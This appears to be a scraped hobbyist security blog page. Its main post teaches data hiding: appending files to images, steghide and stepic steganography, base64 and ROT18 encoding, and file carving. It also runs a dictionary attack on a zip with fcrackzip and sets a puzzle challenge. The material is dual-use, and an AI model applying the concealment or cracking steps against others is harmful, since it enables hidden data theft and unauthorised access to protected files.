<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq-02_zps87259a74.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq-02_zps87259a74.png" height="388" width="640" /></a><br />
<br />
<br />
Then open the <b>index.html</b> file in your web browser.<br />
As written in java it should work on most modern browsers in most OS'.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq03_zpsa8f8a66e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq03_zpsa8f8a66e.png" height="506" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq04_zps83f8068c.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/freq04_zps83f8068c.png" height="640" width="638" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The script is awesome, it shows the letter frequency analysis, most common two and three letter sequences, and a very quick and easy way to check substitutions.<br />
<br />
For quick checks on letter substitution encoded text , this script is definitely what I will be using first.<br />
Thanks for the share lightningmanic !<br />
<br />
<br />
<br />
<br />
<b>POSITION DEPENDANT SHIFT CIPHERS</b><br />
<b>===================================</b><br />
<br />
These are more complicated to find and sometimes come with a hint, sometimes left for the user to figure out.<br />
<br />
There are too many variations to go through into it in much depth, but the idea is to basically have the letters shifted a number of letters depending on their position in the word or sentence.<br />
<br />
So for instance the word 'computer' with the shift '2, 4, 6.. ' could be encoded into ;<br />
c=(c + 2) == E<br />
o=(o + 4) == S<br />
m=(m + 6) == S<br />
p=(p + 8) == X<br />
u=(u + 10) == E<br />
t=(t + 12) == F<br />
e=(e + 14) == S<br />
r=(r + 16) == H<br />
<br />
It comes down to a lot of trial and error, in the past I have used a 'template' like the below to stare at thinking of possibilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/TEMPLATE_zps6c26b972.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/TEMPLATE_zps6c26b972.jpg" height="116" width="640" /></a></div>
<br />
<br />
<br />
<br />
There are so many possible varations that it can be quite a daunting task and deciphering such an encoded message becomes a lot harder, however with sufficient text and quite a bit of trial and error, success can be achieved !<br />
<br />
<br />
<br />
<br />
Should you feel inclined to give the scripts mentioned in this post a whirl, please let me know if any unexpected errors or weird output is encountered.<br />
<br />
<br />
Edit 30-07-2013<br />
---------------------<br />
I'll admit I do like the fact that people take an interest and take the time to download scripts that I put up here :)<br />
Sofar, over 100 people have taken the interest to do so, and I would be very interested to hear their thoughts on the cshift script !<br />
<i>(be gentle... ;) )</i><br />
I truly do appreciate feedback, and although I am only a hobbyist in this field and the code will make many eyes bleed, your thoughts on the script and possible improvements are always appreciated !<br />
<br />
Thanks for trying it out !</div>
Unknownnoreply@blogger.com19tag:blogger.com,1999:blog-8356530514965708840.post-39370601804011583212013-01-05T12:12:00.000+01:002013-02-06T10:06:01.251+01:00Data Obfuscation<div dir="ltr" style="text-align: left;" trbidi="on">
Security through Obscurity<br />
========================<br />
<br />
Methods of hiding information without it appearing that there is any information, is an interesting topic and I recently got thinking on it following a few image challenges which were posted on various security sites a while ago.<br />
I failed miserably at the challenges, but at least picked a few things up on the way to my epic fail..<br />
<br />
Although security through obscurity is not truly secure, it is an interesting method of getting information to someone whilst being hidden to the un-informed.<br />
<div>
<br /></div>
<i>This post is about the simple methods possible to use to hide info from the un-informed, the methods described are not supposed to be terribly secure, but rather, interesting.</i><br />
<br />
The below done on VMWare Image of BackTrack5 R3 and on a Windows 7 PC.<br />
<br />
The first stage is to have a look at the file information and see what information is revealed.<br />
<br />
<b>LOOKING AT THE BASIC INFORMATION OF AN IMAGE FILE</b><br />
<b>====================================================</b><br />
<br />
<b>Exif Data</b><br />
<b>-------------</b><br />
Image files often contain Exif data which can be read in the hex of a file, but using a tool such as Exiftool greatly simplifies this.<br />
<br />
exiftool will also give you information on the file type.<br />
<br />
exiftool can be run from the command line, and there is also a Windows GUI for exiftool available.<br />
run 'exiftool file.jpg' from the command line and you will be presented with information available in the file which can include things like GPS positions camera make/model, software, comments, etc etc.<br />
<br />
General usage on command line ;<br />
<span style="color: lime;">exiftool matrix.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix-1-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="534" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix-1-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
There are a huge amount of options possible with exiftool, and it is a fantastic tool to manipulate information in image files.<br />
Check out the links at the bottom of this post for further information.<br />
<br />
<b>Hex Data</b><br />
<b>--------------</b><br />
Nearly all files have a so-called 'header' and 'trailer', some files types only have a 'header'.<br />
The header and trailer of files are sections of the file which identify the file type so Operating Systems understand what fileformat they are dealing with.<br />
These headers and trailers are typically unique for the file type and a good resource for checking the file signatures is ; <a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">http://www.garykessler.net/library/file_sigs.html</a><br />
<br />
So when we have a file to examine, for instance a JPG file, open it with a Hex Editor (I am using Windows based HxD Hex Editor) and have a look at the file headers and trailers.<br />
<br />
Image file matrix.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You will see that the file starts with 'FF D8 FF' and ends with 'FF D9'.<br />
<br />
Image file header;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_header.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_header.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Image file trailer;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_trailer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/matrix_trailer.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If there is extra data after the <b>trailer</b> FF D9, then it is possible that there is some sort of extra data to be found.<br />
The information after the FF D9 trailer can give you an idea of what the extra information could be. In the below example the information after file trailer FF D9 starts with a known file header '50 4B 03 04' (PK.. in ACSII format), so it would appear that there is a zip file appended to the JPG.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/trailer-header.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/trailer-header.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So by checking the information in a Hex editor you can quickly see whether the file appears to be what it is supposed to be, or whether something looks out of the ordinary.<br />
<br />
<br />
<br />
<b>ATTACHING INFORMATION TO A FILE</b><br />
<b>=================================</b><br />
With many file formats it is possible to attach file information which can later be retrieved based on the above principal of files having headers and trailers.<br />
<br />
kitty-hack1.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="212" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack1.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
kitty-hack2.jpg;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="239" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hack2.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
For instance in Windows with 'Command Prompt';<br />
<span style="color: lime;">copy /b kitty-hack1.jpg + kitty-hack2.jpg kitty.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty_copyb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty_copyb.jpg" /></a></div>
<br />
<br />
<br />
In Linux with 'cat' (lolz, no pun intended ;) ) ;<br />
<span style="color: lime;">cat kitty-hack1.jpg kitty-hack2.jpg > kitty.jpg</span><br />
<br />
The above commands will copy/append the data from kitty-hack2.jpg to kitty-hack1.jpg and name<br />
the output file to kitty.jpg.<br />
<br />
When checking the kitty.jpg in a Hex Editor you will see that there is a JPG trailer 'FF D9' followed by a JPG header 'FF D8 FF' of the second file.<br />
So although it looks like 1 file, there are in fact 2 files which can be confirmed by this check in a Hex editor.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hex.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-hex.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i><b><br /></b></i>I cant post the kitty.jpg here as the photo sharing site I use (Photobucket) removes any extraneous information after the first found trailer on jpeg files.<br />
This 'limitation' could be bypassed though by converting the 1st image to .bmp format (which has no trailer) and copying the 2nd image to the bmp file ;<br />
Result after the conversion of the 1st image to .bmp format and then appending kitty-hack2.jpg with the above mentioned <b>copy /b</b> method ;<br />
<span style="color: lime;">copy /b kitty-hack1.bmp + kitty-hack2.jpg kitty.jpg</span><br />
<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-1.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="213" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-1.jpg" width="320" /></a><br />
<br />
<br />
Just by looking at the hex you would see something is up, and with a search for the JPG header 'FF D8 FF' in the above image you will find that the 2nd file is appended.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-bmp-jpg.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/kitty-bmp-jpg.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This method of hiding files/data by copying/appending to files can be done with many filetypes.<br />
You can also for instance place files in a zip archive and copy this archive to an image in the<br />
same way (zip secret files, append to image file, image file can then also be opened with Archive tool);<br />
<span style="color: lime;">copy /b image.jpg + info.zip hidden.jpg</span><br />
<br />
Of course it should be noted that this is not at all a secure way of hiding information, but for those not in the know, there is no indication that extra information is even there.<br />
<br />
For instance I found this one online a while ago, cant remember where, but in any case if anyone objects to it being posted here, just say the word and I'll take it down.(image/content not made by me)<br />
Below is a .png file and contains a .rar file with content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Puzzling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" height="320" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Puzzling.png" title="PUZZLING.JPG" width="233" /></a></div>
<br />
<br />
<br />
<br />
<b>STEGANOGRAPHY</b><br />
<b>================</b><br />
Stegonography is the method of hiding information in a file in a way that only the recipient<br />
of the file should know or be able to extract.<br />
There are quite a few programs out there that can do this, but none are really maintained.<br />
Steghide is a popular one which can hide information in various filetypes (JPG/BMP/WAV/AU)<br />
and is installed on most PenTest distros.<br />
<br />
If for instance you have a file 'passwords.txt' and want to hide it in an image 'forest.jpg'<br />
you would run steghide as follows ;<br />
<span style="color: lime;">steghide embed -cf forest.jpg -ef passwords.txt</span><br />
You can also specify a different filename for the output using -sf ;<br />
<span style="color: lime;">steghide embed -cf forest.jpg -ef passwords.txt -sf forest1.jpg</span><br />
You will be prompted to enter a password which you can do or else leave blank for no password.<br />
<br />
To later retrieve this information you would run steghide as follows ;<br />
<span style="color: lime;">steghide extract -sf forest1.jpg</span><br />
You will be prompted for a password, if there is none, simply hit enter to leave blank<br />
and steghide will attempt to extract the hidden data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="440" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
forest.jpg;<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="240" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
forest1.jpg<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forest1.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Another interesting one is 'stepic' which is not installed on stock BT5R3 but can easily be done by ;<br />
<span style="color: lime;">apt-get install python-stepic</span><br />
<br />
stepic uses LSB (least significant bit) methods to hide any data in an existing png file. It does not include a password / encryption option and so is not a secure method, but works fine to hide data.<br />
<br />
<span style="color: lime;">stepic -h</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/stepic-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="408" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/stepic-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>FILE CARVING</b><br />
<b>=============</b><br />
File Carving is the process of extracting files from data based on headers and trailers.<br />
This is usually done on whole disc images, mainly for data recovery purposes on for instance damaged or unmounted drives requiring data extraction.<br />
Some programs used for such operations on linux and available on most PenTest distros are for instance 'foremost' & ' scalpel'<br />
<br />
The same principal however can be used on a single file if it appears that extra information is available within the file.<br />
<br />
So if you find a JPG file (file1.jpg) with extra information after the expected trailer,<br />
you could cut the first part of the file from the header 'DD F8 FF' (start of JPG file)<br />
until the end of JPG file (denominated with FF D9).<br />
<br />
In your Hex editor select and cut the data away from (the first if there are more than one) 'FF D8 FF'<br />
upto and including 'FF D9' and save the file.<br />
<i>(you could then paste the cut section to a new file in HxD and save as file2.jpg to see</i><br />
<i>whether it matches what you saw in initial JPG file for verification)</i><br />
<br />
You should then have a stripped file which you can then check again for file properties.<br />
This file may have different properties, and so again you may have to look for headers and trailers.<br />
(is it a different filetype ? check headers and trailers with the aforementioned <b><i><a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">file signatures</a></i></b> link)<br />
<br />
The above sequence is just a simple example. Possibly data you have will require different methods,<br />
however for this example it is to simply show how you can 'carve' one file away from another<br />
when dealing with simple appended files.<br />
<br />
<br />
<br />
<br />
<b>BASIC ENCODING/ENCRYPTION</b><br />
<b>----------------------------------------</b><br />
Some basic encoding and/or encryption can also be used to further obfuscate the hidden data.<br />
The below examples are very weak methods of doing such, however it is simply to show how<br />
data can further be made difficult to retrieve if you are not aware of the methods used to hide it.<br />
<br />
<b>BASE64</b><br />
<a href="http://en.wikipedia.org/wiki/Base64" target="_blank">base64 </a>is a method to convert binary data to ASCII characters.<br />
This could be used to for instance append data to an image file in ASCII form even further obfuscating the data.<br />
<br />
base64 is installed on most linux distros, to use simply ;<br />
<span style="color: lime;">base64 inputfile > outputfile</span><br />
to decode ;<br />
<span style="color: lime;">base64 -d filein > fileout</span><br />
On windows you could download the bas64.exe from <a href="http://www.fourmilab.ch/">www.fourmilab.ch</a><br />
<span style="color: lime;">base64.exe -e inputfile outputfile</span><br />
to decode<br />
<span style="color: lime;">base64.exe -d filein fileout</span><br />
<br />
<b>ROT13</b><br />
<a href="http://en.wikipedia.org/wiki/ROT13" target="_blank">ROT13</a> is an 'encryption' that basically moves all letters of the alphabet up 13 letters, a variant of the <a href="http://en.wikipedia.org/wiki/Caesar_cipher" target="_blank">Caeser shift cipher</a>.<br />
ROT5 is the same method based on moving numeric values up 5 numbers.<br />
Using them together is sometimes referred to as ROT18.<br />
<br />
So it is easy to identify and encode or decode, even more so if you have a reference of some kind and is<br />
NOT a secure encryption method, but fun to play with.<br />
<br />
If you were to see a line of text like ; uggc://jjj.paa.pbz<br />
You can see that there are similarities with a normal web address, but the wording/letters don't appear to match up to what you would expect.<br />
Run a ROT13 script over the line uggc://jjj.paa.pbz ;<br />
<span style="color: lime;">echo uggc://jjj.paa.pbz | tr a-zA-Z n-za-mN-ZA-M</span><br />
and you will find outcome ; http://www.cnn.com<br />
<br />
If there are digits there you could also include a ROT5 script and make it a ROT18.<br />
<br />
So a quick and dirty ROT18 one-liner could look like the below ;<br />
<i>encoding with ROT18</i><br />
<span style="color: lime;">echo "My birthday is 01-01-1900" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
Zl oveguqnl vf 56-56-6455<br />
<br />
<i>Decoding with ROT18</i><br />
<span style="color: lime;">echo "Zl oveguqnl vf 56-56-6455" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
My birthday is 01-01-1900<br />
<br />
<br />
I made a quick and dirty rot18 encoding/decoding script for shits and giggles should it be of interest<br />
which can be run on either input or on a file.<br />
Download;<br />
<a href="http://www.mediafire.com/file/qvfr0p0006oqzyp/rot18.sh" target="_blank">http://www.mediafire.com/file/qvfr0p0006oqzyp/rot18.sh</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A similar, but more elaborate variation is the <a href="http://en.wikipedia.org/wiki/ROT13" target="_blank">rot47</a> encryption.<br />
<br />
Same as the above, a simple script on rot47 encoding / decoding ;<br />
<a href="http://www.mediafire.com/file/83pag27jmfvqgqa/rot47.sh">http://www.mediafire.com/file/83pag27jmfvqgqa/rot47.sh</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot47-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="448" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot47-1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very basic, but does the job.<br />
<br />
<br />
<b>Consider this scenario of keeping/sharing your passwords ;</b><br />
<b>------------------------------------------------------------------------------</b><br />
-> Create your passwords.txt<br />
-> Zip passwords.txt and password protect it to pass.zip.<br />
<span style="color: lime;">zip pass.zip -e passwords.txt </span><br />
-> Encode passwords.zip with base64 to pass.base<br />
<span style="color: lime;">base64 -w 0 pass.zip > pass.base</span><br />
(the '-w 0' to prevent linewraps that make it easer to add to an image comment.)<br />
<br />
You could even ROT18 the file to further obfuscate the data ;<br />
ROT18 encode the base64 file<br />
<span style="color: lime;">cat pass.base | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4 > pass.rot</span><br />
-> Find or create a nice image that would not arouse suspicion.<br />
As the amount of data is so small, it can be included in the image comment, which is probably safer as if you are using image hosting websites they may strip off superfluous info from the jpg.<br />
-> Add the data to the image comment using exiftool.<br />
<span style="color: lime;">info=$(cat pass.rot) ; exiftool performance.jpg -comment=$info</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass1.png" /></a></div>
<br />
<br />
-> Upload image file to photo or file sharing site and send yourself the link or whatever is appropriate.<br />
<br />
Performance.jpg ;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/performance.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/performance.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Retrieval ;</u></b><br />
<span style="color: lime;">exiftool performance.jpg -b -comment > out.put</span><br />
ROT18 decode the file<br />
<span style="color: lime;">cat out.put | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4 > rot.out</span><br />
Decode the base64<br />
<span style="color: lime;">base64 -d rot.out > pass.zip</span><br />
Unzip the created .zip file.<br />
<span style="color: lime;">unzip pass.zip</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass2.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
(password hint; <a href="http://www.mediafire.com/file/i7iidriywydcaal/worst_500_passwords.txt" target="_blank">worst 500 passwords</a>)<br />
<span style="color: lime;">fcrackzip -Dp worst_500_passwords.txt -uv pass.zip</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pass3.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A highly cumbersome and not terribly secure method of doing something simple, but still food for thought on what is possible on hiding information in 'plain sight'.<br />
<br />
<br />
<br />
<b>Team THS Challenge </b><br />
<b>================</b><br />
I made the below file for the <a href="http://top-hat-sec.com/forum/index.php" target="_blank">Top Hat Security team</a> for an article on this same subject in our members magazine, based on the above possibilities.<br />
See what you can discover and post the outcome here or on the <a href="http://top-hat-sec.com/forum/index.php" target="_blank">THS forums</a> !<br />
<br />
Download the challenge (challenge.jpg) here ;<br />
<a href="http://www.mediafire.com/?4sgybntg3qy60ov" target="_blank"><b><span style="color: red;">http://www.mediafire.com/?4sgybntg3qy60ov</span></b></a><br />
<br />
<br />
<i><b><span style="color: red;">Edit dd 04-02-2013</span></b></i><br />
No takers / results on the above THS challenge.jpg file ?!<br />
<br />
Some hints then..<br />
The file challenge.jpg contains a password protected zip file, contents of which can be<br />
extracted with a password which can be found in the challenge.jpg image data..<br />
<br />
The challenge.jpg actually has 4 images (including challenge.jpg) and the final outcome<br />
of the challenge should be a text file starting with ;<br />
<br />
<i><span style="color: yellow;">Well done ! </span></i><br />
<span style="color: yellow;"><i><br /></i>
<i>Challenge complete, hope it was enjoyable !</i></span><br />
<br />
All required processes are described in the above post, but if you're stuck, leave a comment<br />
with what you have done / tried and I will see if it merrits a response ;)<br />
<br />
<br />
<br />
<b>CREDITS/LINKAGE ;</b><br />
<b>==================</b><br />
<b><u>Top Hat Security</u></b><br />
<a href="http://top-hat-sec.com/main/">http://top-hat-sec.com/main/</a><br />
<b><u>Exiftool</u></b><br />
<a href="http://www.sno.phy.queensu.ca/~phil/exiftool/" target="_blank">http://www.sno.phy.queensu.ca/~phil/exiftool/</a><br />
<b><u>Exiftool GUI</u></b><br />
<a href="http://freeweb.siol.net/hrastni3/foto/exif/exiftoolgui.htm" target="_blank">http://freeweb.siol.net/hrastni3/foto/exif/exiftoolgui.htm</a><br />
<b><u>Exiftool forums</u></b><br />
<a href="http://u88.n24.queensu.ca/exiftool/forum/index.php" target="_blank">http://u88.n24.queensu.ca/exiftool/forum/index.php</a><br />
<b><u>HxD Hex Editor</u></b><br />
<a href="http://mh-nexus.de/en/hxd/" target="_blank">http://mh-nexus.de/en/hxd/</a><br />
<b><u>Steghide</u></b><br />
<a href="http://steghide.sourceforge.net/download.php" target="_blank">http://steghide.sourceforge.net/download.php</a><br />
<b><u>Stegdetect - Outguess</u></b><br />
<a href="http://www.outguess.org/detection.php" target="_blank">http://www.outguess.org/detection.php</a><br />
<b><u>Stepic</u></b><br />
<u><a href="http://domnit.org/blog/2007/02/stepic-explanation.html">http://domnit.org/blog/2007/02/stepic-explanation.html</a></u><br />
<b><u>File Signatures</u></b><br />
<a href="http://www.garykessler.net/library/file_sigs.html" target="_blank">http://www.garykessler.net/library/file_sigs.html</a><br />
<br />
Some incredibly annoying challenges can be found here ;<br />
<a href="http://www.wixxerd.com/challenges/">http://www.wixxerd.com/challenges/</a><br />
<br />
<br />
<b><u><br /></u></b>
</div>
Unknownnoreply@blogger.com29tag:blogger.com,1999:blog-8356530514965708840.post-69284116370926171782012-10-26T12:22:00.000+02:002013-02-07T02:48:18.836+01:00Manipulating wordlists with WLM (Wordlist Manipulator)<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Wordlist Manipulator</b><br />
<b>=================</b><br />
<b><br /></b>
<b><i><span style="color: red;">Post still to be fully completed</span></i></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm_v0-7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wlm_v0-7.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
WLM WIKI<br />
<b><a href="http://code.google.com/p/wordlist-manipulator/w/list" target="_blank">http://code.google.com/p/wordlist-manipulator/w/list</a></b><br />
<br />
Google Code main page ;<br />
<a href="http://code.google.com/p/wordlist-manipulator/" target="_blank"><b>http://code.google.com/p/wordlist-manipulator/</b></a><br />
<br />
<b>Video using WLM (old version v0.5) on BackBox ; </b><br />
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/FpflByHLp1I?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
